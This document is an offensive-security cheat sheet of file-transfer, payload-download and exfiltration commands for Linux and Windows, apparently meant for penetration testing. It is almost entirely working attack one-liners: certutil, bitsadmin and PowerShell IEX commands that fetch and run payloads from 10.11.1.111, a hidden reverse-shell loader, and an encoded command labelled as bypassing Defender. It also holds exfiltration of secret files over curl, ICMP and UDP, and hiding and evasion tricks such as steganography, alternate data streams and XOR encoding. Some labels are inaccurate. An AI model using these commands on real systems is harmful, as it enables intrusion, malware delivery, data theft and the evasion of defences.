File Transfer
Linux
# Web Server - Advanced File Hosting
# Updog - Enhanced Python HTTP Server
pip3 install updog
updog --password "SuperSecurePass123!" --ssl --port 4443
# Python3 Web Server (Better for HTTPS & Hidden Files)
python3 -m http.server 8080 --directory /opt/files/ --bind 0.0.0.0
# FTP Server - Faster File Transfer
python3 -m pyftpdlib --port 21 --user attacker --password SuperSecretPass --write
# SCP Transfer (Secure Copy)
scp file.txt user@target:/tmp/
# Rsync Transfer (Stealthy with Compression & SSH Tunnel)
rsync -avz -e "ssh -p 2222" myfile user@target:/tmp/
# SSH Reverse Shell with File Transfer
ssh -R 2222:localhost:22 user@target
# SFTP Transfer with Obfuscation (Mimicking Legit Traffic)
echo 'put myfile' | sftp -oPort=22 user@target
# Exfiltration via DNS Tunneling (Bypassing Firewalls)
cat secretfile | base64 | ncat --udp 8.8.8.8 53
# Steganography - Hiding Data Inside Images
steghide embed -cf cover.jpg -ef secret.zip -p "StegoPass123!"
# Encrypted File Transfer with GPG
gpg --output encrypted_file.gpg --symmetric --cipher-algo AES256 myfile
scp encrypted_file.gpg user@target:/tmp/
Windows
# Bitsadmin - Stealthy Download
bitsadmin /transfer myjob /download /priority high http://10.11.1.111/payload.exe C:\Windows\Temp\payload.exe
# Certutil - Bypassing Windows Defender
certutil -urlcache -split -f "http://10.11.1.111/malware.exe" C:\Users\Public\malware.exe
# Powershell - Evasion with User-Agent and Encoding
powershell -ep bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.11.1.111/file.exe','C:\Users\Public\file.exe')"
# PowerShell Invoke-WebRequest - Proxy Bypass
Invoke-WebRequest -Uri "http://10.11.1.111/payload.ps1" -OutFile "C:\Users\Public\payload.ps1"
# FTP Automated Download
echo open 10.11.1.111 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo GET backdoor.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -s:ftp.txt
# SMB Server via Impacket (Useful for Pivoting)
impacket-smbserver -smb2support SHARED /tmp/ -username user -password pass
# Downloading via SMB (Victim Machine)
copy \\10.11.1.111\SHARED\payload.exe C:\Users\Public\payload.exe
# Bypassing Windows Defender with Encoded Base64 PowerShell Payload
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('IEX (New-Object Net.WebClient).DownloadString("http://10.11.1.111/payload.ps1")'))
powershell -e $encoded
# Using Invoke-WebRequest with Referrer Spoofing
Invoke-WebRequest -Uri "http://10.11.1.111/hack.exe" -Headers @{Referer="https://microsoft.com"} -OutFile C:\Users\Public\hack.exe
# Reverse Shell via PowerShell & File Transfer
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object System.Net.WebClient).DownloadString('http://10.11.1.111/revshell.ps1') | IEX"
# Python WebSocket File Transfer
python3 -m websocket_server 8081 --directory /tmp/
# ICMP File Transfer (Stealthy Data Exfiltration)
hping3 -1 --data 1024 -c 10 -E secretfile 10.11.1.111
# Base64-Encoded Exfiltration via cURL
cat secretfile | base64 | curl -X POST --data-binary @- http://10.11.1.111/upload
# Reverse SSH Tunnel for File Transfer
ssh -R 2222:localhost:22 user@target
scp -P 2222 file user@localhost:/tmp/
# NTFS Alternate Data Streams (Hiding Data in Windows)
echo "Hidden data" > normal.txt
echo "Stealthy payload" > normal.txt:payload.txt
type normal.txt:payload.txt
Evasion & Advanced Tactics
# Obfuscated PowerShell One-Liner Download (Bypassing EDR)
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.1.111/malware.ps1')"
# XOR Encoding to Bypass Signatures
cat payload.exe | xor 0xAA > encoded_payload
scp encoded_payload user@target:/tmp/